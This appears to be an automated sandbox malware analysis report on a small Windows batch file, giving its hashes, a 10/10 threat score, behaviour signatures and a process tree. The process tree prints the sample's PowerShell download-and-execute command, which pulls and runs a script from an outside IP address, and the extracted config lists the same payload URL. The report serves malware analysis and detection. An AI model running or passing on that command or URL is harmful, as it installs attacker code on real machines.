Analysis
max time kernel: 131s
max time network: 68s
platform: windows10_x64
resource: win10v200430
submitted: 17-05-2020 20:10
Static task: static1
Behavioral task: behavioral1
  Sample: df334765cb86900aeb9265c48916c137.bat
  Resource: win7v200430 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: df334765cb86900aeb9265c48916c137.bat
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
Target: df334765cb86900aeb9265c48916c137.bat
Size: 216B
MD5: a5ab635f123ce58648141c6dfd2b8c99
SHA1: da19de350a515c434870a6493a1d7484cb5f64df
SHA256: ec1d6ba7554a54f9a7f29c8d80402ca165daad5f17549536d444fd0308adf769
SHA512: e69b7a51700f56cb940b3fba88e836a799cbbd61be6a57199ed18161a2096a688effd8c2a20409022791ee2c28ec1037c908eb338763bf43f53d5809eeeff691
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Source: ps1.dropper
  URLs: http://185.103.242.78/pastes/df334765cb86900aeb9265c48916c137
Signatures
Program crash (1 IoCs)
  Processes:
  process       pid   pid_target  target process
  WerFault.exe  2196  1928        powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  description                pid   process
  Token: SeRestorePrivilege  2196  WerFault.exe
  Token: SeBackupPrivilege   2196  WerFault.exe
  Token: SeDebugPrivilege    2196  WerFault.exe
Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
  pid   process
  2196  WerFault.exe (14 identical entries)
Processes
1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\df334765cb86900aeb9265c48916c137.bat"
   PID: 1732
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/df334765cb86900aeb9265c48916c137');Invoke-ADDYUVRSM;Start-Sleep -s 10000"
      PID: 1928
      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 704
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
         PID: 2196